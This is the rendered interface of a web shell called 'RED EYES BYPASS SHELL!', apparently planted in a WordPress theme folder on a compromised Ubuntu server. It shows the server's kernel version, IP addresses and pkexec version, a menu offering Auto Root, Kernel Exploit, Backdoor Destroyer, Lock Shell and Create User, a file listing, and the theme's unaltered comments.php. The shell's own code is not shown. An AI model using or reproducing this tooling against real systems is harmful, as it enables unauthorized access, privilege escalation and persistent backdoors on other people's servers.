Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
blossom-spa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
build
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
sections
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
896
B
-rwxr-xr-x
archive.php
1.26
KB
-rwxr-xr-x
comments.php
1.62
KB
-rwxr-xr-x
footer.php
1009
B
-rwxr-xr-x
front-page.php
600
B
-rwxr-xr-x
functions.php
2.3
KB
-rwxr-xr-x
header.php
1.18
KB
-rwxr-xr-x
index.php
1.37
KB
-rwxr-xr-x
page.php
933
B
-rwxr-xr-x
readme.txt
11.18
KB
-rwxr-xr-x
rtl.css
24.5
KB
-rwxr-xr-x
screenshot.png
198.97
KB
-rwxr-xr-x
search.php
1.25
KB
-rwxr-xr-x
sidebar.php
449
B
-rwxr-xr-x
single-blossom-portfolio.php
2.29
KB
-rwxr-xr-x
single.php
955
B
-rwxr-xr-x
style.css
176.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template for displaying comments * * This is the template that displays the area of the page that contains both the current comments * and the comment form. * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package Blossom_Spa */ /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) { return; } ?> <div id="comments" class="comments-area"> <?php // You can start editing here -- including this comment! if ( have_comments() ) : ?> <h2 class="comments-title"><span> <?php printf( // WPCS: XSS OK. /* translators: 1: comment count number. */ esc_html( _nx( '%1$s Comment', '%1$s Comments', get_comments_number(), 'comments title', 'blossom-spa' ) ), number_format_i18n( get_comments_number() ) ); ?> </span></h2><!-- .comments-title --> <ol class="comment-list"> <?php wp_list_comments( array( 'style' => 'ol', 'short_ping' => true, 'callback' => 'blossom_spa_theme_comment', 'avatar_size' => 50, ) ); ?> </ol><!-- .comment-list --> <?php the_comments_navigation(); // If comments are closed and there are comments, let's leave a little note, shall we? if ( ! comments_open() ) : ?> <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'blossom-spa' ); ?></p> <?php endif; endif; // Check for have_comments(). comment_form(); ?> </div><!-- #comments -->
Close